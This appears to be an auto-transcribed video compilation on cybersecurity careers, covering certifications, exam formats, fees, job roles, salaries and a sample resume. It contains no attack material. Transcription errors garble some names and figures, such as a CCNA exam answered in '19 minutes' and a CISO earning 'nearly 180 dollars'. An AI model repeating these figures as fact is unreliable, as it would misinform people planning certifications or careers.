Job role so obtaining a cyber security certification ensures or shows uh to the organization that you’re applying to that you do have that prerequisite knowledge and you should be shortlisted for an interview the knowledge that you have gained during the training will help you when you attend that interview
And when you attempt to answer the questions asked to you so these certifications are designed for a specific role uh for example a forensic investigation certificate will teach you how to investigate a crime scene forensically a digital crime scene for a matter of fact a certified ethical hacking course will teach you about
Penetration testing so it is you who is going to decide which certification you require and then attempt to get certified on it of course a fresher with a cyber security certification will have better employment opportunities because they can showcase their knowledge with the certification that they already have
Even professionals who want to enhance their careers can get into managerial or advanced certifications to improve on their knowledge and get promoted in their job profiles so cyber security cringe certifications can be classified in three different aspects the first one being the foundational level then the managerial level and the advanced level
In the previous video we just had a small overview here we are going to discuss about what the certification covers how the exams are conducted and the price points for each and every exam so let’s start with the foundational certifications we start off with ccna which is the basic certification for
Networking so the ccna routing and switching certification basically it helps you build your networking career you will join an organization as a networking engineer where you can help the organization establish the routing uh the pathing of how data packets will travel across the network this certification covers all the basic
Concepts that you require to understand networking the basic requirements for this certification are that the candidate must have a bachelor’s degree but apart from that there are no other prerequisites so it’s just that you need a bachelor’s degree and then you can apply uh you can study for this you can
Undergo a training and then you can attempt the exam uh the certification provider obviously is cisco so the knowledge that is limited to this training and certification is for cisco devices only the exam fees for this certification is approximately 325 dollars the exam when it is conducted it
Has around 50 to 60 odd questions which need to be answered in 19 minutes the type of questions that you are going to get is multiple choice questions where you have a question and four answers and you have to choose the correct answers among those drag and drop where you have
To click on an object and drag it to its appropriate place probably a architectural diagram and you have to let’s say pick on a router and place it into a particular position if you place it correctly you answer the answer the question correctly otherwise it’s wrong and a simulator where you go
Where there could be a configuration you need to configure it in a particular manner and then check whether the configuration is correct or not the pass mark is around 800 to 850 out of a possible thousand marks so each question will have a different weightage depending on the depth of the question
Depending on the difficult level of the question or the difficulty level of the question which uh would then count towards your marks and if you score 800 to 850 that’s when you clear the exam the job roles as we have discussed over here would be more more on the network
Administrator side or a network engineer site depending on the level of experience that you have the salaries that are expected from these job roles in the us are around fifty five thousand dollars to ninety thousand dollars annually the next one is the comchai certification called security plus comchai is also a global certification
Authority for uh infosec courses so this certification teaches candidates on how to secure applications networks and devices it focuses on hands-on practical skills in the field of network security i have trained people on this certification myself so i know this certification is quite hands-on it deals
With the concepts to the core it helps you understand the concepts and then in the practical hands-on demo you need to execute the practical yourself so that you can gain that knowledge the recommended level for a candidate to attempt this training would be at least around two years of experience in the
Iit sector in addition if you have already been certified for network plus certification from comchia which is the baseline networking certification this is also a preferred way to go for this certification as said komcha is the certificate provider and the exam fees for this certification is 339
The exam is quite simple 90 questions in 90 minutes that’s one minute per question it sounds like a lot of time but believe me the questions can be a little bit confusing can be a little bit lengthy so you will require all those 90 minutes to answer those questions
Especially when they’re tricky and they’re technical in nature the questions would be multiple choice and performance based the past mark for this exam is around 750 points out of a possible 900. the job profiles for this kind of a certification is when you want to apply for a security analyst position
Or a security engineer’s position where you’re going to analyze some data to understand and figure out what problems are ongoing in the organization uh the average annual salary of this person would be around 72 000 then comes the ceh or the certified ethical hacker training from ec council
Now this is a very well-known course and also uh ac council is a global certifying authority very well accepted across a lot of countries uh this is an offensive certification so here you’re basically trying to become a penetration tester you’re taught how to hack you’re taught how to attack a particular
Organization from an ethical hacker’s perspective so the job profiles that you’ll be looking here are of a pen tester where you go into an organization you test their security controls or you test their devices find out flaws within them and then provide recommendations of how to plug those flaws or mitigate
Those flaws and improve the security of that organization it is recommended that you have two years of experience at least in networking or security for these uh to attempt this kind of trainings and certifications again a basic understanding of networking maybe a little bit of applications operating systems would be necessary before
Attempting this certification the certification provider is ec council and the exam fees for this certification is 500 so the exam here would be 125 questions which needs to be attempted in four hours and you will only get multiple choice questions in here now for ceh there are two exams one is the multiple
Choice questions and the second is a practical exam where you need to solve some given problems to you in a i lab scenario and if you are able to solve them properly you then get certified for ceh practical the cut off varies from 65 to 85 percent depending on the questions
That you have answered and the weightage associated with each and every question as said the job roles would be as a penetration tester a security engineer and your salaries would start from around 90 000 annually then comes the cnd or the certified network defender also from ec council now this is more on
The network defense side so here again the job rules would be where you’re where there’s a network that you have and you’re going to try to secure the network and the communications that are going to travel over the network so you need to be a network administrator a
Network security engineer or us in a similar profile to understand how networks work and then you’re going to attempt to secure those networks the certificate provider again is ec council and the certification is placed a little bit below ceh so it becomes network defense then ceh where you’re going to
Become a penetration tester the exam fees for this certification is 350 us dollars the exam the exam is of 100 questions to be answered in four hours again it’s just a multiple choice questions so you get a question with four options you answer the correct one
And you move on to the next question the past percentage again varies from 60 to 85 percent depending on the questions answered and the weightage of that question job rules to be applied network defense technician cnd analyst or a security analyst from a network perspective salaries would range from 65
000 to 75 000 per annum then comes the forensic investigator course which is exactly what it is digital forensic investigator this will help you understand how computers work where data is stored and how you can retrieve that data to investigate a crime that has uh taken place so the candidate must have
At least two years of experience in the information security sector they need a good understanding of how networks work how computers work how operating systems work how they store data the location where that data is stored how databases work how those databases store those data and so on so forth this
Certification is sought after mainly in the law enforcement areas but there are a few corporates that offer forensic investigation as a service especially when a corporate gets compromised and they want to conduct their own investigations the certification provider for this is also ec council and the exam fees are 500
This is an advanced level certification so uh understanding of applications networks and operating systems is a must before you attend this the exam is quite similar 150 questions in four hours again it’s just a multiple choice question exam the cutoff again is from 60 to 85 percent depending on the
Questions and the weightage of each and every question job rules i.t security specialist network security pro the job roles forensic investigators law enforcement agencies security specialists homeland security jobs and your salaries would be around eighty eight thousand dollars and above all right now let’s talk about the managerial level certifications cobit
Stands for control objectives for information and related technologies it’s a certification that will give a candidate an in-depth knowledge of the framework for which cobit is all about and the framework helps you manage and govern enterprise id environments now this is advanced certification so around eight years of managerial experience is
Suggested before you attempt the cobit 5 certification to understand all the aspects and to help you implement the framework properly the certification certificate provider is asaka the exam fees are around 175 dollars now this is a small exam 50 questions but in 40 minutes so you really have to be on your
Toes you have to know the knowledge there is very limited time to think and you have to be fast in your answers the past percentage is 50 percent the job roles associated with this certification would be to when you apply for a information security manager or as a
Security consultant or a cyber security manager and your roles and responsibilities would be the governed and it space that the organization owns so all the servers desktops the network the data flows the databases everything and how it needs to be managed and how it needs to be governed in a secure
Manner annual salaries would be around a hundred thousand dollars plus then the cism also called as cism it stands for certified information security manager and as the name suggests it’s a security manager certification it helps the candidate in understanding the relationship between business goals and information security so now you’re going
Into the space where you’re not only technically in nature but you also have to understand the business needs the goals of the business and you have to align the information security of your infrastructure along with the business needs and the business goals so it is
Your inputs that are going to go to the management to see if the infrastructure is aligned to the business goals or if the infrastructure or the business goals need any fine tuning around five years of work experience is recommended in the information security field for attempting the cism out of the five
Years the candidate must have a background as an information security manager for three years so you have some experience as a manager uh you have implemented those things yourselves which will give you a better understanding and then you attempt the certification again providing by asaka and the exam fees for asaka memphis is
575 dollars for non-members it is 760 the exam is where you have to answer 150 questions in four hours uh quite a bit of time but questions are going to be uh scenario based questions where they’re going to give you a lot of scenarios you
Have to think about it and you have to give the most probable and the correct answer for that particular scenario the past mark is 450 out of 800. your job profiles would be either a risk manager or a risk consultant analyzing the business requirements to the infrastructure security that that you
Have and to identify if there any risks associated with the infrastructure highlight those risks and then put in security controls and manage those controls in a way where security is mitigated your average salaries would be around 88 000 and above then the cisa or the cisa the certified information
Systems auditor certification it not only looks into security but it also looks into auditing and controls in information systems this is a highly reputed certificate and you gain a better understanding of governance regulations and auditing your information landscape again a minimum of five years of work work experience in
The field of information systems auditing control or security is necessary now here the question would be what’s the difference security is where you’re technical in nature you have done let’s say a vulnerability assessment or a penetration test you have implemented firewalls you have architected security controls are all about the security
Controls that you’re going to implement like firewalls idss ips’s data loss prevention systems uh maybe even utms and whatnot so experience in architecting or implementing those controls in an effective manner mitigating your security or your your vulnerabilities that you have identified in the organization and auditing would basically mean about looking at
Compliance to ensure that everything is in place you’re compliant with let’s say uh iso 27001 guidelines or the policies that you have created yourself and everything is working in order so it’s more of a checklist where you’re going to just check everything is in place and you’re conforming to
Standards this certification is also provided by isaka and the exam fees for isaka members are 575 dollars whereas non asaka members will have to pay 760 dollars for the certification 150 questions again in four hours multiple choice questions scenario based so you have to really understand this uh real
World scenarios of where what controls and what audit mechanisms should be in place pass mark is 450 out of 800. your job roles would be mainly becoming an auditor or a senior auditor a director for information security information audit manager or information technology consultant where you provide intelligence on how the company should
Implement their infrastructure average salaries would be 103 000 and above then comes the crisc also called as krisk certified in risk and information systems control certification helps the candidate design and maintain information systems controls for an organization this is one of the most sought after certifications as far as
Risk management is concerned in europe and in us if you have this kind of certifications you automatically qualify for a risk manager or a security risk manager or a information security consultant kind of a role you should have a minimum of three years of experience in the field of is controls
That means information security controls you should have knowledge about firewalls you should know about how to mitigate risks how to identify risks in the first place risk analysis risk management and after which you’re going to implement security controls to mitigate that risk or bring it to acceptable levels at this point in time
You will also be responsible to create policies revolving those risks and how you want to calculate those risks and treat those risks in their lifetime certificate provider again is asaka 575 dollars for isaka members 760 dollars for non-isa members for the exam fees a similar question 150 questions to be
Answered in four hours multiple choice based on performances so they may give you a scenario where you have to perform a risk analysis and provide a report and a solution based on your findings again the past mark is 450 out of 800. the job profiles associated as discussed earlier
Are the i.t risk management professionals where they’re going to identify risks treat those risks calculate analyze maybe do a business impact analysis to ascertain how the organization is going to be affected and then you will also be looking at compliances as far as these job roles are concerned average annual salary
Would be 119 000 and above moving on to advanced level certification now this is where we come across the cissp or the cis certification certified information system security professional this is the gold standard of all certifications if you have this certificate it’s you can basically be assured of a job in the id
World now just to qualify you’ll have to have five years of experience in the information security field there are eight domains that are specified by cissp and you have to prove that you have knowledge and your work experience of around five years in at least two of
Those two means if you do not have those kind of experiences you can still attempt the exam but you become an associate of iic square which means that you get six years to accomplish the five years of uh experience requirement for this certification before taking up the cis certification is suggested that the
Candidate clears all the intermediate level certifications not all but some of them in fact i have seen people do the other way around they qualify for cissp they give the exam once your cissp the csa or see some cis or cism exams are way easier to crack but you need to have
That kind of experience i have seen people with 15 years of experience and more fail at this certification in the first attempt the certificate provider is isc square the exam fees is 699 dollars like i said this certification is most sought after the gold standard in fact there’s hardly any other certifications after
This that you might want to do the questions now the exam has changed if it is the english version that you’re giving it’s 150 questions to be answered in three hours if it is the non-english exam that you’re attempting then it is 250 questions in six hours it’s a
Marathon and if you’re opting for the six hour exam you need to plan it really well it sounds really easy but the questions are quite tough they’re scenario based and the answers are quite confusing as well you would get multiple choice questions you would get drag and
Drop and you might get simulators as well uh the past mark is 700 out of 1000 but each question has a different weightage so it depends on which questions are asked of you and which questions you have answered correctly the job rules associated with this certification would be anything and everything in
Information security at the managerial level and above so information security manager risk manager system information system security officer the cso role the ciso chief information security officer any role that you might think of as a risk from a risk compliance strategy could be achievable after this kind of a
Certification the average annual salary is hundred and eight thousand dollars for this certification so to be an ethical hacker you must hold a certification which specializes in ethical hacking or in cyber security companies look for candidates who are globally certified when we say globally certified they’re looking for a
Certificate that has been given by an organization that is recognized globally and is well accepted in the industry so these are the top five certifications our candidate can obtain the first one become a certified ethical hacker then there is global information assurance certification penetration tester then offensive security certified
Professional comptria pentest plus and finally the license penetration tester now these certifications are offered by different organizations all of these organizations are recognized globally and their certifications are well accepted in the technical space so let’s start off with the certified ethical hacker and we’ll look at the organizations that provide these
Certifications and how we can attain them so ceh or certified ethical hacker in its current form is in its version 10 it’s been revised and updated over a period of time ec council is the certifying authority for ceh they have their own authorized training centers through which you can attend trainings
Give those exams get yourself certified and thus become globally certified and can be eligible to apply for security related jobs it is a very well known certification and is widely accepted at the same time it would test the candidates knowledge of security threats and preventive measures now there are
Two types of exams that you can give with ceh one is a multiple choice question exam which is theoretical in nature they ask you questions and you answer the correct uh you select the correct answers if you clear you get certified the second certification nowadays is where there’s a practical
Exam associated with it that’s a you’ll have to purchase the voucher for that exam and give that exam the practical exam is held in a virtual lab where they you’re given scenarios and based on those scenarios you have to resolve the questions given to you and give proof of
The resolution which would then get you certified as an ethical hacker the theoretical exam in this scenario is the fees is around 500 this is for the multiple choice question exam where you can pay the fees and you can attend through a online portal and you can give the exam
Directly the exam is four hours long in which you have to answer 125 questions now four hours for 125 questions seems a long time but it isn’t it’s a very technical exam there are scenario based questions and it would take some time for you to analyze and understand the
Question and then identify the equivalent correct answer so it’s a very competitive exam and you’ll have to study really hard to clear this exam as well the cutoff for passing varies from 60 to 85 percent so there is no exact grade and all the questions have different weightages so depending on the
Questions that have been given to you and the way that you have answered them you would pass at either 60 percent or you would pass when you scored 85 percent once you are ceh certified which is a very technical certification you will be qualified to apply for job roles
As a penetration tester or a security engineer these are job roles where you would be responsible of ethically trying to attack applications servers switches and try to find out vulnerabilities within them the training of this certification will make you adept in most of these tools that are
Required there are a lot of practicals in this training and if you successfully completed those practicals clearing the exam is a queer easy task with the practicals comes your knowledge and would help you understand how you would be performing penetration tests in the real world an average annual salary in
The usa for a cea certified person is around ninety one thousand dollars and in india is around four like seventy six thousand odd rupees the salaries would vary as far as organizations are concerned uh more established organizations can afford to pay a little bit more but these are average salaries
That we have seen across the market the next certification is the g pen also known as the global information assurance certification penetration tester this certification looks into the different pen testing practices and methods also focuses on the various problems and pen testing so again this is where you’re getting certified as a
Penetration tester so it’s again a technical certification where your knowledge on networking applications and security of which will be tested you will be trained on this of course so the training will include all these areas where you need to focus identify those problems and thus be ready for the real
World scenarios the candidate will have to understand networking concepts and operating systems such as linux and windows and you should be very well aware of the tcp protocols this is true for any of the technical certifications for ethical hacking giac is the certification provider it’s again a very well renowned and well accepted
Certification authority across the globe the exam fees are 1899 82 215 questions to be answered in three hours now why 82 215 it depends on the test that has been associated and depending on how you’re answering those questions uh you would be given those many number of questions to begin with
But all of these need to be answered in three hours 74 is the past percentage that is required to clear this exam the average annual salary in the usa is around 96 000 while in india it is around similar to certified ethical hacking then looking at the next certification from offensive security
Called the oscp offensive security certified professional this is another penetration testing certification highly technical in nature and it is an entirely hands-on certification the previous two certifications that we saw we talked about ceh where there are two different exams you could either take the theoretical exam and give your mcqs or
You could take the practical one here you don’t have an option this is a practical exam so the test is conducted on a virtual network so they send out instructions to you there’s a virtual lab that is given out to you and they give you the questions and you have to
Perform those assessments create those reports and provide it to the certifying authority in this case offensive security if you match their criterias of whatever you have identified in those reports you get certified here the requirements of good understanding of networking protocols how systems function how kali linux operating system functions and the
Candidate must complete offensive securities penetration testing with the kali linux course and pass the hands-on exam so this focuses purely on kali linux kali linux is an operating system that is freely distributed over the internet and comes structured with around 300 plus tools used for ethical hacking so this course totally relies on
Kali linux for you to use as a tool set for penetration testing the certificate provider as stated is offensive security the name of the course is oscp offensive security certified professional exam is around 800 to 1550. now understand that this exam is technical and is hands-on so for you to
Prepare for this exam they come up with virtual labs where you can start practicing and honing your skills depending on the number of days for which you have purchased the access to that particular labs the amount will vary from eight hundred dollars which would be the minimum access days
Available to one thousand five hundred and fifty dollars where the maximum number of days would be given to you for practicing once you’re ready even during the time spa time span of where you have that access once you’re ready for the exam you can they can attempt the exam
And clear the average annual salary is similar around 91 000 for the u.s market and 905 000 rupees in the indian market then looking at the comptia pentest plus comptia is another certification authority or a certification provider a training provider that that will help you get yourself certified in the
Ethical hacking space so they have certification called pentest plus which is focused towards penetration testing so it is an intermediate level certification it assesses the vulnerability assessment and the penetration testing skills of a candidate here the training will provide you with all the essentials where it will help you identify how to do
Vulnerability assessments how to identify those vulnerabilities and then which tools to utilize for what kind of a penetration test for the requirements a minimum of three to four years of hands-on experience in the information security field also a comptia security plus or a network plus or equivalent
Knowledge is required so in the network plus they talk about securing networks and they help you understand the osi layers the tcp layers and help you understand the protocols and all of those things so having that knowledge is an added advantage the certificate provider is comptia and the cost of the
Exam is around 349 maximum number of questions is 85 and i think it’s a three hour exam the passing percentage is uh scoring 750 marks out of a possible 900. so the scale is the minimum you can ever score is 100 if you’re completely unprepared
The maximum you can score is 900. uh you get a leeway of 150 marks for your certifications so you have to score a minimum of 750 to clear the exam average annual salary for a hampshire certified penetration test plus professional is 97 000 in the u.s market and in the indian
Market it would be around 5 lakh rupees then comes the license penetration tester now this is an advanced certificate again from ec council this is where ec council gives you a license which certifies that you have undergone thorough training and have cleared your exam in which you can conduct or lead a
Audit for vulnerability assessment and penetration testing it is an expert level certification comes after the ceh certification it is the ultimate test which tests this candidate’s penetration testing skills so there are two certifications over here one is the ecsa ec council certified security analyst once you clear that you get you can
Appear for the license penetration tester both of these are hands-on certifications so you will be given a virtual lab you will be given a scenario in which you’ll have to perform some assessments create reports submit it to the ec council they will analyze your reports if they meet the criterias that
Have been identified you would then be certified as a licensed penetration tester the candidate must be above 18 years of age a recertification is required every three years so the validity is three years after three years you will have to be re-certified or there is a continuing point education
System over there where you can score points by publishing articles by attending trainings or giving out trainings and you can get yourself re-certified it is preferred that the candidate has ceh and the ecsa certification so the previous certification that we saw certified ethical hacker and then the ecsa ec
Council certified security analyst after which you can appear for the lpt license penetration tester the certificate provider again is ec council the license penetration tester exam has a different process the candidate must purchase an exam dashboard for 899 which is valid for a year so once you purchase the
Voucher the validity is one year you can prepare within that one year and then give the exam and attain the certification only once you’re ready the exam can be scheduled and you can give that exam the exam consists of three different levels each level has three different challenges the candidate must
Pass at least one challenge in order to qualify for the next level and for each level the exam is six hours so this is a grueling exam this is hands-on they’re giving you challenges and they are going to test you on your skills as a penetration tester so be ready to be
Very hands-on for this kind of a certification average annual salary in the us is around hundred thousand dollars and above and in india 825 000 and above in today’s world data is generated in exchange at a high speed did you know that 2.5 quintillion bytes of data are generated every day
Companies all over the world make crucial decisions by analyzing all of this data with the rise of data there has been a tremendous increase in the number of cyber crimes across the globe to prevent cyber attacks cyber security is implemented so what is cyber security it is nothing but the practice of
Protecting networks programs computer systems and their components from unauthorized digital access as mentioned earlier companies rely on data and it is required that the data is not compromised or stolen to do this job we have various cyber security professionals who are skilled to protect data from cyber attacks there has been a
Sky high growth in the number of cyber security jobs this growth will only double in the near future as companies will always be on the lookout for skilled professionals who can protect the confidentiality of the data so now that we know why cyber security jobs are
Important let us have a look at the various cyber security job rules there are various kinds of cyber security job roles let’s go through few of the top paying job roles going in the descending order of the salary structures in the usa we first have the chief information
Security officer job role followed by the security architect penetration tester then we have cyber security engineer malware analyst and finally we will look into the computer forensic analyst job role i will now preview about each of these job roles individually and look into their responsibilities skills and
Salary structures both in the usa and in india so let’s start off with chief information security officer a ciso is a senior level officer in any organization he is entrusted with the safety of the data in an organization a ciso has various responsibilities they are required to develop implement and
Maintain an organization’s security and risk management program they also communicate with their organization stakeholders and brief them about various information related security concerns by doing so they are able to implement a better security system for an organization at times a ciso would have to also recruit an id team’s
Members they need to make sure that the candidate is knowledgeable and skilled a company’s risk and vulnerabilities have to be predicted beforehand prediction of such risks and vulnerabilities are taken care of by a ciso they play a major role in preventing cyber attacks in any organization let’s now look at the
Different skills required to be a chief information security officer first and foremost a candidate must have good communication and presentation skills this is very important for any organization a degree in computer science along with an mba is a preferred qualification mba is not mandatory but there is an added advantage if the
Candidate has an mba along with a computer science degree the candidate must be good at handling security breaches it is preferred that the candidate has prior experience of handling a security breach and who is also good with incident management many employers prefer candidates who have global certifications to become a chief
Information security officer the preferred certifications are cism that is certified information security manager and certified information system security professional cissp if a candidate has either of these certifications they have a better chance of getting a job as a chief information security officer let’s now move on to their salary structures a ciso earns
Nearly 180 dollars in the usa in india the salary is nearly 25 lakhs per annum that’s a lot of money so these were the responsibilities skills and the salary structure of a chief information security officer let’s move on to our next role our next role is that of a
Security architect a security architect maintains the security of an organization’s computer systems they prevent the computer systems from malware attacks let’s look into their responsibilities first and foremost our security architect identifies weak spots in a system by performing vulnerability tests these tests are carried out on a regular basis along with vulnerability
Tests risk analysis and security assessments are also done by a security architect installation of routers vpn and firewalls are approved by a security architect these devices are very important when it comes to the security of an information system well a security architect rightly approves the installation of these devices digital
Signatures and public key infrastructures are designed in addition to all the ebar responsibilities a security architect also provides technical assistance and guidance to the other security team members let’s now move on to the skills required to be a security architect first and foremost the candidate must have a computer
Science or an information technology degree coming to the experience the candidate must have an experience in the field of risk management as the role of a security architect is a lot to do with managing risks understanding of the network basics and various security protocols along with cryptography is
Required to be a good security architect lastly the preferred certification to become a security architect is that of a cissp which is certified information system security professional as mentioned earlier this is only a preferred certification a candidate who has this certification has a higher chance of banking a security architect
Job let’s now look into the different salary structures in the usa and in india in the usa a security architect earns nearly 123 000 dollars per annum in india a security architect earns nearly 20 lakhs per annum so that’s all about security architect let’s now move
On to our next role that is penetration tester a penetration tester also known as an ethical hacker is a cyber security professional who tries to exploit a security system’s just like how a hacker would do a penetration tester mimics the role of a hacker let’s look into the various
Responsibilities of a penetration tester as the name suggests a penetration tester needs to perform penetration tests to discover and identify vulnerabilities in a system in addition to this they are also responsible for designing new penetration tools all the penetration tests results are documented and based on the document new security
Measures are discussed with the other it team and the management a penetration tester performs tests by developing codes and they also conduct security audits which help them understand the vulnerabilities in a system let’s now look into the different skills required to be a penetration tester a candidate
Must have one to four years of experience in the information security field knowledge of windows linux unix operating systems is required also the candidate must know c and c plus plus languages such as java php and perl are preferred by employers but not a requirement to successfully back the
Position of a penetration tester the preferred certifications are certified ethical hacker that is ch and certified expert penetration tester that is cept let’s look into the salary structures of a penetration tester in the usa a penetration tester earns nearly 117 000 dollars per annum and in india a
Penetration tester makes nearly 4 lakh rupees per annum so those were the responsibilities skills and salary structures of a penetration tester let’s now move on to our next job role that is cyber security engineer on the whole a cyber security engineer protects an organization’s network and its data they
Also plan security measures to prevent an organization from cyber attack let’s look into the responsibilities of a cyber security engineer they design cyber security platforms for a company they are also responsible for planning and implementing cyber security measures well a cyber security engineer solely designs plans maintains and implements
Security measures in an organization they are also required to report and communicate with the other teams in an organization a cyber security engineer is different from a network security engineer while a network security engineer looks into the troubleshooting a cyber security engineer looks into the prevention of cyber attacks let’s look
Into the skills required to become a cyber security engineer just like the other job profiles a degree in computer science or information technology is a must well two years of experience in the relevant field is required to become a cyber security engineer a cyber security engineer is needed to design security
Systems hence a candidate with a good problem solving skill is required along with good problem solving skills the candidate must also be good with networking skills as mentioned earlier knowledge of cnc plus plus is a must java and python knowledge is preferred to be a cyber security engineer moving
On to the salary a cyber security engineer earns nearly 96 000 dollars in the usc whereas in india a cyber security engineer earns nearly 7 lakh rupees per annum moving on to our next job role that is malware analyst as the name suggests a malware analyst is one who identifies various cyber threats
Such as worms viruses trojans boats to understand their nature a malware analyst is skilled at analyzing the different malware threats in a system let’s now look into a malware analyst’s responsibilities they are responsible to identify threats and once they identify they are supposed to document the methods to avoid such malware threats
They also research and develop malware protection tools various malware protection tools are developed by malware analysts so that the next time a cyber threat occurs they’re able to easily identify in addition to the above responsibilities a malware analyst is also responsible to constantly be updated with the new malware threats
Moving to the skills required a candidate must know windows linux unix operating systems and knowledge of c and c plus plus is a must usage of tools like ida pro early dbg reg short and tcp view is suggested having a gi ac reverse engineering malware certification is a
Plus point the certification is only a preferred certification it is not a must that the candidate must process this certification moving on to the salary structure a malware analyst earns nearly thousand dollars in the usa and earns nearly rupees six lakhs per annum in india so those were the skills
Responsibilities and salary structure of a malware analyst let’s move on to our last job role that is computer forensic analyst previously we have seen the job roles wherein they try to protect a company from a cyber attack in this role we will see how a computer forensic
Analyst works after a cyber attack a computer forensic analyst works on cases following an attack they collect digital evidences to retrieve information let’s look into their responsibilities with the help of various investigation tools a computer forensic analyst gathers evidences from a system which was a victim of a cyber attack their main
Responsibility lies in recovering deleted manipulated or stolen data a computer forensic analyst helps various officials in investigating a case by discovering evidences from data which was manipulated or compromised there have been a lot of cases where a computer forensic analyst has come to the rescue of the police department
Moving on to the skills the candidate must hold a bachelor’s degree and work experience in the related field is required for the post of a computer forensic analyst it is not necessary that the candidate must hold a computer science degree but the candidate must have relevant work experience a
Candidate must have knowledge of networking law and criminal investigation as they have to do a lot with investigating cases as well a sound analytical mind is critical as they have to analyze data and arrive at conclusions as to identify the cyber criminals the preferred certifications to become a computer forensic analyst
Are certified forensic computer examiner that is cfce and certified computer examiner that is cce well these were the skill sets required to become a computer forensic analyst moving on to the salary structures a computer forensic analyst earns nearly 71 000 dollars in the usc and in india a computer forensic analyst
Earns nearly 8 lakh rupees per annum that was all about computer forensic analyst well those were the six top eight jobs in the field of cyber security now i will run you through a sample resume of a cyber security engineer this is only a sample resume of
A cyber security engineer you can alter it according to your own preference here we first start off with the name and your email id and phone number then a quick summary about yourself and what you’re good at and what you are looking for in an organization after which you
Can give your linkedin profile link and your github profile link if you have one moving on to the experience here you would have to give the company’s name and the tenure ideally for a cyber security engineer the minimum number of years required is two and below that you can write the different responsibilities
That were taken care by you in your previous organization tcp network administration and security monitoring are two important responsibilities that any cyber security engineer must have on their resume it is great if you have configured firewalls and ids as well underneath that you can mention the education and it is required that you
Have a degree in computer science or in information technology you can then mention your university and your gpa moving on to the skills we have technical skills and non-technical skills here under technical skills you would have to write the languages that are known to you for example c c plus
Plus which is a must java and python are preferred too knowledge of windows linux and unix operating systems will also have to be on your resume if you’re applying for a post of a cyber security engineer the other skills depend from person to person here i have ids and ips penetration vulnerability testing
Encryption technologies knowledge of sql and at the end you can also write the certifications ideally a cyber security engineer must have ccna ccnp certifications in addition to it even a compti certification is preferred moving on to the non-technical skills here you can mention the languages that you’re good at the different competitions that
You have participated in it can also have your co-curricular activities and anything to do with problem solving would also be an added advantage first let me briefly introduce comptia before moving on to the comptia security plus certification the computing technology industry association or better known as comptia is a leading vendor-neutral i.t
Certification provider in the world comptia is considered one of the top trade associations its vendor neutral certification program is undoubtedly one of the best in the iit industry for more than two decades comptia has developed certification exams and training for networking security open source development and cloud to name a few
Comptia certifications continue to address the requirements and necessities of today’s technology challenges comtia certifications are grouped by skill set presently comptia certifications are classified into four areas core infrastructure cyber security and additional professional certifications if you have a job that may involve some sort of certification you must consider obtaining that certification
Certifications are very crucial comptia certifications are a way for it professionals to demonstrate their knowledge of computers let us now have a look at a few of the certifications offered by comptia first we have comptia a plus comptia a plus certification is an entry level certification for it technicians
This certification is designed for employees who are seeking a career as a support service center or networking technician this certification tests a candidate’s understanding of basic networking troubleshooting and security skills it covers laptop and pc hardware software installation and configuration of operating systems according to comptia more than one
Million it professionals hold the a plus certification next we have comptia network plus you can either start with the a plus certification however if you have the experience you can move directly to the comptia network plus certification this certification is for professionals who carry a minimum of nine months of networking experience
Here a candidate must be familiar with networking technologies topology security installation and configuration and troubleshooting of wireless and wired network devices next we have comptia security plus comptia security plus covers network security concepts threats and vulnerabilities access control identity management cryptography and much more we will closely look at the comptia
Security plus certification in this video and finally this comptia cloud plus the comptia cloud plus certification finds its importance as the cloud computing market continues to grow by leaps and bounds this certification targets it professionals with two to three years of experience in storage networking or data center administration
The certification exam tests the candidates knowledge of cloud technologies cloud markets and hybrid and multi-cloud solutions those were a few of the certifications offered by comptia there are several other certifications like comtia linux plus comptia pentest plus and comptia project plus to name a few
Now let us have a look at the comptia security plus certification in detail so what is the comptia security plus certification well the comptia security plus certification is a leading entry-level it certification it is an essential certification for professionals working in the it industry it is one of the first security
Certifications that must be earned by it professionals it provides the core knowledge required of any cyber security role and provides a spring boot to various intermediate level cyber security jobs this certification teaches you how to secure applications devices and networks it also focuses on hands-on practical skills in the field of network security
The certification teaches you skills from spotting and mitigating risks to troubleshooting security incidents it is to be noted that it professionals with comptia security plus know how to address security incidents and not just identify them so now that you know what comtia security plus certification is about let
Us look at a few points as to why a professional must choose this certification the first reason being it’s a vendor neutral certification the comptia security plus certification is vendor neutral which implies that you don’t have to center on technology and security of a precise vendor the skills and knowledge achieved through this
Certification make security professionals and network administrators become in demand in the it marketplace the comptia security plus certification is globally acknowledged to be one of the fundamental security certifications in the field of cyber security comptia security plus certification is universally recognized and trusted across the world security plus provides hands-on skills
One of the few entry-level cyber security certifications that emphasizes on hands-on practical skills this ensures a security professional is better prepared to solve several complex issues of the current times the comptia security plus certification is aligned with the latest techniques and trends it covers core technical skills in risk assessment and management
Incident response foreign six and cloud operations to name a few thereby ensuring high performance on the job having this security certification provides you a wider breadth of career opportunities the comptia security plus exam is performance based which makes the knowledge and skills learned more applicable there are numerous job roles that turn
To security plus to supplement baseline cyber security skills cyber security professionals are in demand by organizations from both private and public areas with this certification you can take up jobs related to compliance and operational security threats and vulnerabilities access control and identity management and cryptography to
Name a few it is to be also noted that professionals with the security plus certification have greater opportunities of receiving higher salaries than non-certified professionals another benefit of this certification is that if you wish to get a cyber security government job obtaining the comptia security plus certification will be an
Ideal starting point for you so now that you know the perks of achieving this certification what do you have to do to achieve this well before you can achieve this certification you have to clear the comptia security plus exam let us now have an overview of the comptia security plus exam
First and foremost who can take up this exam although comptia does not have any set prerequisites organizations recommend that candidates meet these two criterias let’s have a look at the two criterias firstly the comptia security plus is for it professionals who carry a minimum of two years of experience in the it
Administration focusing on security the comptia security plus is ideal for professionals who are looking to start or advance a career in security obtaining this certification prepares the professionals for job roles like system administrator security administrator network administrator junior penetration tester security engineer and security consultant to name a few
Though comptia security plus is an entry level certification it is strongly recommended that you get the a plus and network plus credentials before proceeding to the security plus certification this will ensure that you have the required technical skills like configuring managing and troubleshooting networks now let’s move on and understand the
Comptia security plus exam details comptia security plus sy-0601 is the latest exam code that was launched on 12 november 2020. the sy-0501 english language exam retires on 31st july 2021 hence we recommend you to opt for the sy-0601 exam there are a maximum of 90 questions comptia security plus exam has multiple
Choice questions but some comptia certification exams include performance-based questions or pbqs performance-based questions test a candidate’s ability to solve problems in a simulated environment the passing score for this certification exam is 750 on a scale of 100 to 900. the duration of the exam is 90 minutes
So time management is crucial to clear the exam since you need to solve each question within a minute comptia security plus sy-060 exam is currently available in english and japanese language you can enroll for the exam by booking a slot online or registering with pearson view testing centers
The price of the comptia security plus certification exam is 370 us dollars in australia the price is 500 australian dollars and in european currency it is 334 euros let us now look at the focus areas of comptia security plus exam firstly this exam focuses on the core cyber security skills required of any
